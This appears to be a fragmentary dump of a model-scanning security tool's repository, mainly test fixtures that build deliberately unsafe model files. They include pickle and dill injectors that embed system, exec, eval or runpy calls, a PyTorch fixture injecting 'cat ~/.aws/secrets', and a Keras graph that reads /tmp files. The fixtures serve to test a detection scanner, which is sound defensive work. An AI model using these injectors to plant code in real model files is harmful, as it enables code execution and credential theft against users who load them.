5 | authors = ["ProtectAI "] 6 | license = "Apache License 2.0" 7 | readme = "README.md" 8 | packages = [{ include = "modelscan" }] 9 | exclude = ["tests/*", "Makefile"] 10 | 11 | [tool.poetry.scripts] 12 | modelscan = "modelscan.cli:main" 13 | 14 | [tool.poetry.dependencies] 15 | python = ">=3.9,<3.13" 16 | click = "^8.1.3" 17 | numpy = ">=1.24.3" 18 | rich = "^13.4.2" 19 | tomlkit = ">=0.12.3,<0.14.0" 20 | h5py = { version = "^3.9.0", optional = true } 21 | 22 | # TODO: Add py3.12 once TF release supports 23 | tensorflow = { version = "^2.17", optional = true } 24 | 25 | [tool.poetry.extras] 26 | tensorflow = ["tensorflow"] 27 | h5py = ["h5py"] 28 | 29 | [tool.poetry.group.test.dependencies] 30 | pytest = ">=7.4,<9.0" 31 | bandit = { version = "1.8.3", extras = ["toml"] } 32 | mypy = "^1.4.1" 33 | requests = "^2.31.0" 34 | aiohttp = "^3.8.5" 35 | dill = "^0.3.7" 36 | types-requests = ">1.26" 37 | torch = "^2.6.0" 38 | tf-keras = "^2.18.0" 39 | 40 | 41 | [tool.poetry.group.dev.dependencies] 42 | dunamai = "^1.18.0" 43 | pre-commit = ">=3.3.3,<5.0.0" 44 | black = ">=23.7,<26.0" 45 | 46 | [tool.poetry.group.prod.dependencies] 47 | dunamai = "^1.18.0" 48 | 49 | [build-system] 50 | requires = ["poetry-core", "poetry-dynamic-versioning"] 51 | build-backend = "poetry.core.masonry.api" 52 | 53 | [tool.poetry-dynamic-versioning] 54 | enable = true 55 | 56 | [tool.bandit] 57 | exclude_dirs = ["tests", "notebooks"] 58 | 59 | [tool.mypy] 60 | exclude = ["notebooks"] 61 | -------------------------------------------------------------------------------- /tests/data/password_protected.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/tests/data/password_protected.zip -------------------------------------------------------------------------------- /tests/data/unsafe_zip_pytorch.pt: 
class MaliciousModule(keras.Model):  # type: ignore
    """Test fixture: a Keras model wrapper whose traced call() performs
    filesystem reads/writes -- used to build unsafe SavedModel artifacts
    that the scanners are expected to flag."""

    def __init__(self, safe_model) -> None:  # type: ignore
        super(MaliciousModule, self).__init__()
        # Benign model being wrapped; prediction is delegated to it unchanged.
        self.model = safe_model

    @tf.function(input_signature=[tf.TensorSpec(shape=(32, 32), dtype=tf.float32)])  # type: ignore
    def call(self, x: float) -> Any:
        """Delegate prediction, then exercise malicious TF file ops.

        tf.function traces these ops into the saved graph, so they run on
        every inference after the model is reloaded.
        """
        # Some model prediction logic
        res = self.model(x)

        # Write a file (arbitrary write from inside the traced graph)
        tf.io.write_file(
            "/tmp/aws_secret.txt",
            "aws_access_key_id=\naws_secret_access_key=",
        )

        # Enumerate and print every .txt file in /tmp (arbitrary reads).
        list_ds = tf.data.Dataset.list_files("/tmp/*.txt", shuffle=False)

        for file in list_ds:
            tf.print("File found: " + file)
            tf.print(tf.io.read_file(file))

        return res
command, and the code to be injected 55 | first: Boolean object to determine if inj_objs should be serialized before the safe file or after the safe file. 56 | """ 57 | super().__init__(file, protocol) 58 | self.inj_objs = inj_objs 59 | self.first = first 60 | 61 | def dump(self, obj: Any) -> None: 62 | """Pickle data, inject object before or after""" 63 | if self.proto >= 2: # type: ignore[attr-defined] 64 | self.write(pickle.PROTO + struct.pack("= 4: # type: ignore[attr-defined] 66 | self.framer.start_framing() # type: ignore[attr-defined] 67 | 68 | # Inject the object(s) before the user-supplied data? 69 | if self.first: 70 | # Pickle injected objects 71 | for inj_obj in self.inj_objs: 72 | self.save(inj_obj) # type: ignore[attr-defined] 73 | 74 | # Pickle user-supplied data 75 | self.save(obj) # type: ignore[attr-defined] 76 | 77 | # Inject the object(s) after the user-supplied data? 78 | if not self.first: 79 | # Pickle injected objects 80 | for inj_obj in self.inj_objs: 81 | self.save(inj_obj) # type: ignore[attr-defined] 82 | 83 | self.write(pickle.STOP) # type: ignore[attr-defined] 84 | self.framer.end_framing() # type: ignore[attr-defined] 85 | 86 | def Pickler(self, file: Any, protocol: Any) -> _Pickler: 87 | # Initialise the pickler interface with the injected object 88 | return self._Pickler(file, protocol, self.inj_objs) 89 | 90 | class _PickleInject: 91 | """Base class for pickling injected commands""" 92 | 93 | def __init__(self, args: Any, command: Any = None) -> None: 94 | self.command = command 95 | self.args = args 96 | 97 | def __reduce__(self) -> Tuple[Any, Any]: 98 | """ 99 | In general, the __reduce__ function is used by pickle to serialize objects. 
def get_pickle_payload(command: str, malicious_code: str) -> Any:
    """Return the PickleInject payload object matching *command*.

    Args:
        command: One of "system", "exec", "eval", "runpy".
        malicious_code: Code/shell text to embed in the payload.

    Returns:
        The corresponding PickleInject.* payload instance.

    Raises:
        ValueError: If *command* is not a recognized injection command.
    """
    if command == "system":
        payload: Any = PickleInject.System(malicious_code)
    elif command == "exec":
        payload = PickleInject.Exec(malicious_code)
    elif command == "eval":
        payload = PickleInject.Eval(malicious_code)
    elif command == "runpy":
        payload = PickleInject.RunPy(malicious_code)
    else:
        # Previously an unknown command fell through to `return payload` and
        # raised UnboundLocalError; fail explicitly instead, matching the
        # sibling get_payload() in notebooks/utils/pickle_codeinjection.py.
        raise ValueError(f"Invalid command provided: {command!r}")
    return payload
    def __init__(self, inj_objs: Any, first: bool = True):
        # Mimic a module-like object (named attribute) so torch's
        # pickle_module hook accepts this class in place of a real module.
        self.__name__ = "dill_inject"
        # Payload object(s) whose __reduce__ emits the malicious call on load.
        self.inj_objs = inj_objs
        # If True, serialize payloads before the user object; otherwise after.
        self.first = first
def get_dill_payload(command: str, malicious_code: str) -> Any:
    """Return the DillInject payload object matching *command*.

    Args:
        command: One of "system", "exec", "eval", "runpy".
        malicious_code: Code/shell text to embed in the payload.

    Returns:
        The corresponding DillInject.* payload instance.

    Raises:
        ValueError: If *command* is not a recognized injection command.
    """
    payload: Any
    if command == "system":
        payload = DillInject.System(malicious_code)
    elif command == "exec":
        payload = DillInject.Exec(malicious_code)
    elif command == "eval":
        payload = DillInject.Eval(malicious_code)
    elif command == "runpy":
        payload = DillInject.RunPy(malicious_code)
    else:
        # The bare `payload: Any` annotation above does not bind a value, so
        # an unknown command previously raised UnboundLocalError at `return`;
        # raise a clear ValueError instead (consistent with get_pickle_payload).
        raise ValueError(f"Invalid command provided: {command!r}")
    return payload
class PyTorchTestModel:
    """Test fixture for producing unsafe (code-injected) PyTorch model files."""

    def __init__(self) -> None:
        # Minimal placeholder module; tests only need something serializable.
        self.model = nn.Module()

    def generate_unsafe_pytorch_file(
        self, unsafe_file_path: str, model_path: str, zipfile: bool = True
    ) -> None:
        """Re-save the model at *model_path* with an os.system payload injected.

        Args:
            unsafe_file_path: Destination path for the unsafe .pt file.
            model_path: Path of an existing saved model to load and re-save.
            zipfile: Whether to use torch's zipfile serialization format
                (True exercises the zip-based scanner path, False the legacy one).
        """
        command = "system"
        malicious_code = """cat ~/.aws/secrets
        """

        payload = get_pickle_payload(command, malicious_code)
        # Passing PickleInject as pickle_module makes torch.save use the
        # injecting _Pickler, embedding the payload in the output file.
        # NOTE(review): torch>=2.6 defaults torch.load(weights_only=True),
        # which can reject full-module pickles -- confirm model_path contents
        # still load under the default, or pass weights_only explicitly.
        torch.save(
            torch.load(model_path),
            f=unsafe_file_path,
            pickle_module=PickleInject([payload]),
            _use_new_zipfile_serialization=zipfile,
        )